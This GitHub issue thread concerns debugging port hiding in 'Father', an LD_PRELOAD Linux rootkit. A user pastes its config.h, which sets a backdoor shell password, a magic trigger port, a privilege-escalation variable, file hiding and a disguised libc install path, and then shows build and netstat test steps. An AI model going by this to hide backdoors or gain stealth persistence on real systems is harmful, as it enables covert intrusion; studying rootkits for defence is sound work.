### ISSUE TITLE
Port hiding is not working either on Debian or Centos

### ISSUE THREAD

**Issue by zuzkie** [mav8557/Father#3]
Hello mav8557,
thank you very much for removing unneeded restricted pointers  I can compile Father on CentOS 7, gcc 4.8.5 20150623 now. However, port hiding does not work either on CentOS or Debian 10 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2. 

[root@osboxes Father]# netstat -tulpn | grep 0.0.0.0:65088
tcp        0      0 0.0.0.0:65088           0.0.0.0:*               LISTEN      2833/ncat           

[root@osboxes Father]# grep HIDDENPORT config.h 
#define HIDDENPORT "FE40"

Thank you.

**Comment by mav8557** [comment]
I haven't been able to test this on Debian yet, but on CentOS 7 I could not reproduce your issue, the port hiding worked fine on my end. Are you certain it's running? You can check with ldd or by manually running netstat with the LD_PRELOAD environment variable set.

**Comment by zuzkie** [comment]
Hello,

here is the output. Thank you.

[centos@osboxes Father]$ more config.h 
#ifndef CONFIG
#define CONFIG

/* magic GID */
#define GID 1337
/* magic source port to trigger accept() backdoor */
#define SOURCEPORT 947
/* time for timebomb() to go off, in seconds since 1970-01-01 */
#define EPOCH_TIME 0000000000

/* magic environment variable for Local Privilege Escalation (LPE) */
#define ENV "father"

/* magic prefix for hidden files */
#define STRING "father"

/* name to hide for files */
#define PRELOAD "ld.so.preload" // used for hiding

/* port to remove from netstat output, etc */
#define HIDDENPORT "44444"

/* password for accept() backdoor shell */
#define SHELL_PASS "father"

/* location of rootkit on disk */
#define INSTALL_LOCATION "/lib64/libc-vdso.so.6" // used for reinstallation

<output truncated>

[centos@osboxes Father]$ sudo make
gcc -Wall -ldl -o rk.so -fPIC -shared -D_GNU_SOURCE father.c
nasm -f elf64 remove_preload.asm
ld remove_preload.o -o fix.bin


[centos@osboxes Father]$ ls -la
total 80
drwxrwxr-x   3 centos centos   194 Nov 10 10:56 .
drwx------. 17 centos centos  4096 Nov 10 10:56 ..
-rw-rw-r--   1 centos centos  7577 Nov 10 10:54 config.h
-rw-rw-r--   1 centos centos 13490 Nov 10 10:52 father.c
-rwxr-xr-x   1 root   root     864 Nov 10 10:54 fix.bin
drwxrwxr-x   8 centos centos   163 Nov 10 10:52 .git
-rw-rw-r--   1 centos centos    15 Nov 10 10:52 .gitignore
-rw-rw-r--   1 centos centos  1211 Nov 10 10:52 LICENSE
-rw-rw-r--   1 centos centos   312 Nov 10 10:52 Makefile
-rw-rw-r--   1 centos centos  2907 Nov 10 10:52 README.md
-rw-rw-r--   1 centos centos   162 Nov 10 10:52 remove_preload.asm
-rw-r--r--   1 root   root     864 Nov 10 10:54 remove_preload.o
-rwxr-xr-x   1 root   root   24552 Nov 10 10:54 rk.so


[centos@osboxes Father]$ export LD_PRELOAD=/home/centos/Father/rk.so


[centos@osboxes ~]$ env | grep PRELOAD
LD_PRELOAD=/home/centos/Father/rk.so


[centos@osboxes ~]$ ncat -lvp 44444 &
[1] 2292
[centos@osboxes ~]$ Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::44444
Ncat: Listening on 0.0.0.0:44444

[centos@osboxes ~]$ netstat -tulpn | grep 44444
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 0.0.0.0:44444           0.0.0.0:*               LISTEN      2292/ncat           
tcp6       0      0 :::44444                :::*                    LISTEN      2292/ncat

**Comment by zuzkie** [comment]
I've simulated port hiding once again on CentOS and it is working as expected. My mistake, please close the issue.

**Comment by mav8557** [comment]
Gotcha, good to know. Closing.
